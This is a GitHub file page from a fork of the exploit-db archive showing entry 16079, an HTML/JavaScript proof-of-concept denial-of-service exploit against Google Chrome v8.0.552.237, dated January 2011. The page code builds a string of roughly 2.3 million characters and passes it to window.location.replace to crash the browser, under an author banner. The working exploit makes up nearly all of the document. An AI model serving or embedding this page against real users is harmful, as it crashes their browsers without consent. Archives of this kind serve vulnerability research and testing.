forked from offensive-security/exploitdb
-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy path16079.html
More file actions
executable file
·54 lines (40 loc) · 1.26 KB
/
Copy path16079.html
File metadata and controls
executable file
·54 lines (40 loc) · 1.26 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
<html>
<head>
# Exploit Title: Google Chrome v8.0.552.237 .replace DOS
# Date: January 30 2011
# Author: Carlos Mario Penagos Hollmann
# Software Link: http://www.google.com/chrome
# Version: v8.0.552.237
# Tested on: Windows xp sp3 ,windows 7 ,linux running on VMware Fusion 3.1 and VirtualBox 3.2.8
# mail----> shogilord^gmail.com spams are welcome!!!!!
# ________ _ _________ ____ __ _____ ________
# / ____/ / | | / / ____/ | / / //_// _/ | / / ____/
# / __/ / / | | / / __/ / |/ / ,< / // |/ / / __
# / /___/ /___| |/ / /___/ /| / /| |_/ // /| / /_/ /
#/_____/_____/|___/_____/_/ |_/_/ |_/___/_/ |_/\____/
# COLOMBIA hacking presents.............
#
# Google Check the replace
#
<script type="text/javascript">
function mul(str,count){
if(count==0) return '';
var binaryCount = count.toString(2);
var numDegree = binaryCount.length;
var resultStr='';
for(var i=0; i<numDegree; i++){
resultStr+=resultStr;
if(binaryCount.charAt(i) == '1'){
resultStr+=str;
}
}
return resultStr;
}
var junka = "a";
var junk = mul(junka,2304453);
window.location.replace("http://" + junk);
</script>
</head>
<body>
</body>
</html>